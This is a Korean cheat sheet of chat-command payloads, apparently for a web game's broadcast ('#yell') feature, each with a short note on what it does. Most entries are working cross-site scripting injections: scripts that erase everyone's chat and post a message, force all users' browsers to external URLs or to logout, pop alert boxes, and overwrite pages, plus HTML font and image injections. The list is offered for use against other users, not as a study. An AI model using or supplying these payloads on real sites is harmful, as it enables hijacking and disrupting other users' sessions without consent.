#yell <script>$(".ChatBox #Chat").html('약먹기를 부탁드립니다! <b>즐약 되시길!');</script>
모든 채팅 삭제 후 메시지 표출

#yell <script>$(".ChatBox #Chat").html('채팅 삭제 완료. <b>도배는 금지한다.');</script>
모든 채팅 삭제 후 메시지 표출

#yell <font color=blue> 이거맞나
모두에게 색깔로 된 공지 표출

#yell <font color=0077ff> 

#yell <font color=ff0000> 

#yell <script>location.href="http://blog.naver.com/123tjdtn/220814528852";</script>
모두 해당 주소로 강제이동

#yell <script>location.href="logout";</script>

#yell <script>location.href="";</script>

#yell <script>location.href="http://repeat.zz.am";</script>

<html> <head> <title> 5초후에</title> <meta http-ｅquiv="refresh" content="5:url=http://www.naver.com/"> </head> <body> <center><br><br><br> <font color="#ffff00" size="5"><b> 5초후에 해당 사이트로 이동 됩니다. </center>

#yell <script>alert("약드시게")</script>
모두 작은 창 뜨기

#yell <script>alert("시 공 조 아")</script>

#yell <script>document.write("약을 잘못 드셨어요");</script>
모두 흰페이지에 해당 글씨로 되어 이동

#yell <img src="http://elfene.x-y.net/xe/files/attach/images/77/744/001/ds.jpg"/>
http://elfene.x-y.net/xe/files/attach/images/77/744/001/ds.jpg
RED SHD

#yell <img src="https://cdn.discordapp.com/attachments/349872629177384961/349872696362008577/G1.png"/>
https://cdn.discordapp.com/attachments/349872629177384961/349872696362008577/G1.png
HOTS

#yell <font color=ff0000> 시끄러워. <img src="http://elfene.x-y.net/xe/files/attach/images/77/744/001/ds.jpg"/>
RED 강화형

#yell <font color=ff0000> 악마 소환한다? <img src="http://cfile26.uf.tistory.com/image/261C3E4E517E3ECB299587"/>
http://cfile26.uf.tistory.com/image/261C3E4E517E3ECB299587
역오망성진

모두 해당 이미지 표출

#yell <script>document.write('<img src="http://cfile26.uf.tistory.com/image/261C3E4E517E3ECB299587"/>\n<font color=ff0000>테스트좀');</script>

#yell <font color=red>R</font><font color=orange>A</font><font color=yellow>I</font><font color=green>N</font><font color=blue>B</font><font color=5555FF>O</font><font color=purple>W</font>

#yell <font color=blue>대신 시공을 드립니다.</font><img src="https://cdn.discordapp.com/attachments/349872629177384961/349872696362008577/G1.png"/>